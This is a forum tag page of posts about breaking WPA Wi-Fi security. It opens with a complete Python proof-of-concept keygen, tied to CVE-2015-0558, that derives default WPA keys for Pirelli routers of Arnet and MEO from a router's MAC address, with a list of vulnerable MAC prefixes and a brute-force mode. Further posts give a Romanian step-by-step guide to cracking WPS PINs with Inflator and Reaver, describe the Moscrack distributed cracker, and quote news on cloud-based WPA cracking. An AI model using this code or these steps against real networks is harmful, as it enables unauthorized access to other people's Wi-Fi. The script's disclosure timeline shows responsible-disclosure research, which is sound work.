Search the Community
Showing results for tags 'wpa'.
-
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' @license: GPLv3 @author : Eduardo Novella @ARNetOnline via Twitter @enovella_ 2014-09-15 Send a message via website, still looking for a simple mail ([url]http://www.telecom.com.ar/hogares/contacto_tecnico.html[/url]) 2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form. 2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key 2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though. 2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest. 2014-09-24 I send the problem to the vendor ADB Pirelli via website form 2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland 2015-01-05 Full disclosure and CVE-2015-0558 assigned PORTUGAL ================ 2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm 2015-04-05 Send a message to @MEOpt via Twitter @enovella_ 2015-04-05 I got response in matter of minutes \o/ 2015-04-05 I send an email to [email]luis-oliveira-cc@telecom.pt[/email] , stating the reference 3-78405621289 in email subject 2015-05-07 Full disclosure ----------------- [*] Changelog : ----------------- 2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX 2015-02-01 v1.3 Final version, hopefully 2015-01-12 v1.2 Confusion between LAN and WLAN mac address 2015-01-10 v1.1 --allKeys flag added 2014-09-11 v1.0 First PoC working ''' import re import sys import hashlib import argparse VERSION = 1 SUBVERSION = 4 DATEVERSION = '2015-05-06' URL = 'http://www.ednolo.alumnos.upv.es' def genkey(mac,stdout='True'): seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' + '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8') lookup = '0123456789abcdefghijklmnopqrstuvwxyz' sha256 = hashlib.sha256() sha256.update(seed) sha256.update('1236790') sha256.update(mac) digest = bytearray(sha256.digest()) if (stdout): print "[+] SHA256 : %s" % sha256.hexdigest() return ''.join([lookup[x % len(lookup)] for x in digest[0:10]]) def printTargets(): print "[+] Possible vulnerable targets so far:" for t in targets: print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper())) sys.exit() def checkTargets(bssid): supported = False for t in targets: if ( bssid.upper().startswith(t) ): supported = True break if (not supported): print "[!] Your bssid looks like not supported! Generating anyway." def addIncToMac(mac_str, inc): try: mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc)) except: sys.exit('[!] Use real input ') return mac def main(): global targets version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL) targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54', '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F'] parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See [url]http://ednolo.alumnos.upv.es/[/url] for more details. Twitter: @enovella_ and email: ednolo[at]inf.upv.es. This software is used just as proof-of-concept, commit fraud depends on you! ''', epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0]) ) maingroup = parser.add_argument_group(title='required') maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address') parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version) command_group = parser.add_mutually_exclusive_group() command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true') command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true") args = parser.parse_args() if args.list: printTargets() elif args.bssid: mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid) if len(mac_str) != 12: sys.exit('[!] Check MAC format!\n') try: checkTargets(args.bssid) print '[+] MAC : %s' % args.bssid if (args.allkeys): print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)' for i in xrange(-2,5): mac = addIncToMac(mac_str,i) print '%-10s' % ((genkey(mac, False))) print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)' for i in xrange(-2,5): mac = addIncToMac(mac_str,i) print '%-10s' % ((genkey(mac, False)[:8])) else: wpa = genkey((addIncToMac(mac_str,0)), False) print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)") print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" ) except: sys.exit('[!] Are you trying to crash me? ') else: parser.print_help() if __name__ == "__main__": main() Source
-
Manualul descrie folosirea Inflator din wifiway v 3.4. Ce este WPS nu va mai descriu.Nu aveti nevoie de dictionare de parole,si nici de alte artificii,este de ajuns ca routerul sa fie cu WPS activat,si in acest caz parola va fi aflata indiferent de cit este de complexa,si indiferent de cite ori o va schimba proprietarul. Odata pornit wifiway,se intra in menu,si se cauta modulul WPA-WPS. Se porneste Inflator si veti vedea daca va recunoaste placa de retea,adaptor wifi sau ce model este,exact ca in imaginea de mai jos. Daca placa de retea va este recunoscuta,dati click pe ea si mai jos va anunta ca a fost pusa in mod monitor,dupa care dati click next. In a doua imagine va trebui sa dati click in butonul pe care apare scris Scan for WPS enabled pentru a scana sa vedeti daca in zona aveti routere cu WPS activat. Timpul cit scaneaza este de 30 secunde,dar il puteti modifica dupa necesitati,si asteptati sa termine scanarea. Dupa ce termina de scanat,daca a gasit routere cu WPS activat le veti vedea in noua fereastra,exact ca in imagine... Inainte sa dati next,dati click pe reteaua pe care vreti,si veti observa schimbare de culoare,in albastru deschis....aceea este reteaua care ati ales-o,si urmeaza next. In urmatoarea fereastra vi se ofera posibilitatea de a seta tipul de atac dorit,dar in mod normal nu se bifeaza nimic,ci se da click pe RUN... Odata pornit atacul,veti observa in textul respectiv Trying pin....lucru care lasa de inteles ca a inceput probarea pinilor WPS Acum va trebui sa aveti rabdare citeva ore ca sa va scoata parola.Daca totul a decurs cum trebuie la final veti vedea cam asa: Manualul complet cu detalii,plus Reaver WPSCrackGUI 1.0.9
-
salut tuturor. am o problema si anume cu Reaver pt o retea WPA...reincearca la nesfarsit aceeasi parola 012345670. culmea la wpa2 nu face asa...care sa fie problema?
-
MOSCRACK Multifarious On-demand Systems Cracker Moscrack is a PERL application designed to facilitate cracking WPA keys in parallel on a group of computers. This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes. With Moscrack’s new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin. Some of Moscrack's features: Basic API allows remote monitoring Automatic and dynamic configuration of nodes Live CD/USB enables boot and forget dynamic node configuration Can be extended by use of plugins Uses aircrack-ng (including 1.2 Beta) by default CUDA/OpenCL support via Pyrit plugin CUDA support via aircrack-ng-cuda (untested) Does not require an agent/daemon on nodes Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin Checkpoint and resume Easily supports a large number of nodes Desgined to run for long periods of time Doesn't exit on errors/failures when possible Supports mixed OS/protocol configurations Supports SSH, RSH, Mosix for node connectivity Effectively handles mixed fast and slow nodes or links Architecture independent Supports Mosix clustering software Supports all popular operating systems as processing nodes Node prioritization based on speed Nodes can be added/removed/modified while Moscrack is running Failed/bad node throttling Hung node detection Reprocessing of data on error Automatic performance analysis and tuning Intercepts INT and TERM signals for clean handling Very verbose, doesn't hide anything, logs agressively Includes a "top" like status viewer Includes CGI web status viewer Includes an optional basic X11 GUI Compatibility Moscrack itself should work with any Un*x variant, but it is developed and tested on Linux. Tested platforms for SSH based end nodes: Moscrack Live CD (SUSE) Ubuntu Linux 12.10 x86 64bit Ubuntu Linux 12.04.2 x86 64bit Ubuntu Linux 10.10 x86 64bit Ubuntu Linux 10.10 x86 32bit CentOS Linux 5.5 x86 32bit FreeBSD 8.1 x86 64bit Windows Vista Business 64bit w/Cygwin 1.7.7-1 Windows Vista Business 64bit w/Cygwin 1.7.9 Mac OS X 10.5.6 (iPC OSx86) Solaris Express 11 x64 iPhone 3g iOS 3.2.1 (Jailbroken) Samsung Galaxy S2 SGH-I727R (Cyanogenmod 10 + Linux chroot) Tested platforms for RSH based end nodes: Ubuntu Linux 10.10 x86 64bit Windows Vista Business 64bit w/Cygwin 1.7.7-1 Windows Vista Business 64bit w/Cygwin 1.7.9 Tested platforms for Mosix end nodes: Ubuntu Linux 10.10 x86 64bit Ubuntu Linux 10.10 x86 32bit Tested platforms for Moscrack server: Ubuntu Linux 13.10 x86 64bit Ubuntu Linux 12.10 x86 64bit Ubuntu Linux 10.10 x86 64bit Download: moscrack-2.08b.tar.gz Sources: moscrack | Free Security & Utilities software downloads at SourceForge.net Moscrack
-
"Roth said that he used his software and Amazon's cloud-based computers to break into a WPA-PSK protected network in his neighborhood. It took about 20 minutes of processing time. He has since updated his software to speed its performance and believes he could hack into the same network in about 6 minutes.[...] People tell me there is no possible way to break WPA, or, if it were possible, it would cost you a ton of money to do so," he said. "But it is easy to brute force them." Sursa: Amazon cloud can help hack WiFi networks: expert | Reuters Prezentarea va fi aici: Black Hat ® Technical Security Conference: DC 2011 // Briefings Btw, daca stie cineva vreun live-streaming / site de download video-urile de la Blackhat, feel free to share .